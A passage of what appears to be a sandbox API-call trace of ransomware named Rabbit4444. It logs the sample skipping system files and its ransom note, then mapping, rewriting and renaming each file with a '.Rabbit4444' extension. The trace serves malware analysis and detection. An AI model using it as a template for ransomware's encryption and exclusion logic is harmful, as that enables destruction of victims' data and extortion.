lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15095135292) returned 1 [0059.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0059.641] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.641] CloseHandle (hObject=0x298) returned 1 [0059.641] CloseHandle (hObject=0x278) returned 1 [0059.641] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms.Rabbit4444") returned 192 [0059.641] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.642] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5708b99d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5708b99d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", cAlternateFileName="CL8409~1.SET")) returned 1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2=".") returned 1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="..") returned 1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="windows") returned -1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="boot") returned 1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.642] lstrcmpiW (lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.642] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms" | out: lpString1="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms") returned="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms" [0059.642] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.643] lstrlenW (lpString="Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms") returned 64 [0059.643] lstrlenW (lpString="Rabbit4444") returned 10 [0059.643] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.643] lstrlenW (lpString=".dll") returned 4 [0059.643] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.643] lstrlenW (lpString=".lnk") returned 4 [0059.643] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.643] lstrlenW (lpString=".ini") returned 4 [0059.643] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.643] lstrlenW (lpString=".sys") returned 4 [0059.643] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ed0ff627-bfd1-4f68-9a74-974e73f41a3a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.643] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.643] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15095410830) returned 1 [0059.643] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1071) returned 1 [0059.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.644] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.644] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.645] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.646] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15095661524) returned 1 [0059.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.646] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.646] CloseHandle (hObject=0x298) returned 1 [0059.646] CloseHandle (hObject=0x278) returned 1 [0059.646] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms.Rabbit4444") returned 192 [0059.646] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ed0ff627-bfd1-4f68-9a74-974e73f41a3a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ed0ff627-bfd1-4f68-9a74-974e73f41a3a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.647] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57124305, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57124305, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x345, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", cAlternateFileName="CLD856~1.SET")) returned 1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2=".") returned 1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="..") returned 1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="windows") returned -1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="boot") returned 1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.647] lstrcmpiW (lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.648] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms" | out: lpString1="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms") returned="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms" [0059.648] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.648] lstrlenW (lpString="Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms") returned 64 [0059.648] lstrlenW (lpString="Rabbit4444") returned 10 [0059.648] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.648] lstrlenW (lpString=".dll") returned 4 [0059.648] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.648] lstrlenW (lpString=".lnk") returned 4 [0059.648] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.648] lstrlenW (lpString=".ini") returned 4 [0059.648] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.648] lstrlenW (lpString=".sys") returned 4 [0059.648] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.648] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.648] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15095925563) returned 1 [0059.649] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=837) returned 1 [0059.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0059.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.649] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x298 [0059.650] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0059.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.651] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15096168147) returned 1 [0059.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0059.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.651] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.651] CloseHandle (hObject=0x298) returned 1 [0059.651] CloseHandle (hObject=0x278) returned 1 [0059.651] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms.Rabbit4444") returned 192 [0059.651] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.652] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571bcc6e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x571bcc6e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", cAlternateFileName="CL42F7~1.SET")) returned 1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2=".") returned 1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="..") returned 1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="windows") returned -1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="boot") returned 1 [0059.652] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.653] lstrcmpiW (lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.653] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms" | out: lpString1="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms") returned="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms" [0059.653] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.653] lstrlenW (lpString="Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms") returned 64 [0059.653] lstrlenW (lpString="Rabbit4444") returned 10 [0059.653] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.653] lstrlenW (lpString=".dll") returned 4 [0059.653] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.653] lstrlenW (lpString=".lnk") returned 4 [0059.653] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.653] lstrlenW (lpString=".ini") returned 4 [0059.653] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.653] lstrlenW (lpString=".sys") returned 4 [0059.653] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.653] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ee423d17-7ed8-4b33-9555-c23deeafb4b6}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.654] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.654] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15096446413) returned 1 [0059.654] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1192) returned 1 [0059.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.654] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0059.655] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0059.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.656] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15096697351) returned 1 [0059.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.656] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.656] CloseHandle (hObject=0x298) returned 1 [0059.656] CloseHandle (hObject=0x278) returned 1 [0059.657] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms.Rabbit4444") returned 192 [0059.657] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ee423d17-7ed8-4b33-9555-c23deeafb4b6}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ee423d17-7ed8-4b33-9555-c23deeafb4b6}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.657] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572555d9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x572555d9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", cAlternateFileName="CLC887~1.SET")) returned 1 [0059.657] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.657] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.657] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.657] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2=".") returned 1 [0059.657] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="..") returned 1 [0059.658] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="windows") returned -1 [0059.658] lstrcmpiW 